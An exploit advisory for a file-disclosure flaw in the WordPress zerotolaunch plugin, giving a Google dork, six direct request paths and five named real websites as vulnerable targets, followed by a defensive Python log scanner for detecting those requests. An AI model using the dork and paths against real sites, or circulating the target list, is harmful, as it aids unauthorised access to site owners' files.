#################################################################################################
# Exploit Title : WordPress zerotolaunch Plugins 1.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/02/2018
# Vendor Homepage : wordpress.org + themesinfo.com/wordpress-plugins/wordpress-zerotolaunch-plugin-djjx
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/zerotolaunch/''
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110216
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2265
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31544
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#                      CWE-23  - [ Relative Path Traversal ]
#                      CWE-200 - [ Information Exposure ]
#                      CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit :
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql
/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] ilovevitiligo.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[+] vidauthority.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[+] tershaandmatt.com/blog/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[+] redeyedistrict.com/zenfen/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[+] creativelifework.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
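Added example for site operators, not part of the advisory: the six paths above are the test fixtures of the php-activerecord library vendored inside the plugin, and a request for them answered with status 200 shows the plugin's Vendor/ tree is served as static files. This script scans web-server access logs in the common "combined" format for requests to those paths and separates actual disclosures (200 with a body) from blocked probes; the log lines are constructed samples, and the field layout is an assumption about the reader's server configuration.

```python
import re
from collections import Counter

# Paths listed in the advisory: php-activerecord test fixtures shipped under the
# plugin's Vendor/ directory. Anything else under the test tree is flagged too.
PLUGIN_DIR = "/wp-content/plugins/zerotolaunch/"
TEST_TREE = PLUGIN_DIR + "Vendor/php-activerecord/test/"
EXPOSED_FILES = {
    TEST_TREE + "sql/" + name
    for name in ("mysql.sql", "oci-after-fixtures.sql", "oci.sql",
                 "pgsql-after-fixtures.sql", "pgsql.sql", "sqlite.sql")
}

# Apache/nginx "combined" log format (assumed): client, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

def classify(line):
    """Return a finding for a request into the exposed test tree, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    if path not in EXPOSED_FILES and not path.startswith(TEST_TREE):
        return None
    status = int(m.group("status"))
    # 200 with a non-empty body means the file content left the server;
    # 403/404 means the probe was made but the file was not served.
    return {"ip": m.group("ip"), "path": path, "status": status,
            "disclosed": status == 200 and m.group("bytes") not in ("-", "0")}

def scan(lines):
    """All findings, plus a per-client count of successful disclosures."""
    hits = [f for f in (classify(l) for l in lines) if f]
    disclosed_by_ip = Counter(h["ip"] for h in hits if h["disclosed"])
    return hits, disclosed_by_ip

# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Feb/2018:10:15:01 +0000] "GET /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Feb/2018:10:15:02 +0000] "GET /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql HTTP/1.1" 403 199',
    '198.51.100.4 - - [03/Feb/2018:10:16:09 +0000] "GET /wp-content/plugins/zerotolaunch/css/style.css HTTP/1.1" 200 812',
    '198.51.100.4 - - [03/Feb/2018:10:16:10 +0000] "GET /wp-login.php HTTP/1.1" 200 2311',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Feed real log lines via `scan(open(path).read().splitlines())`; a non-empty disclosure count is the signal to remove or deny the plugin's Vendor/ test directory at the web server.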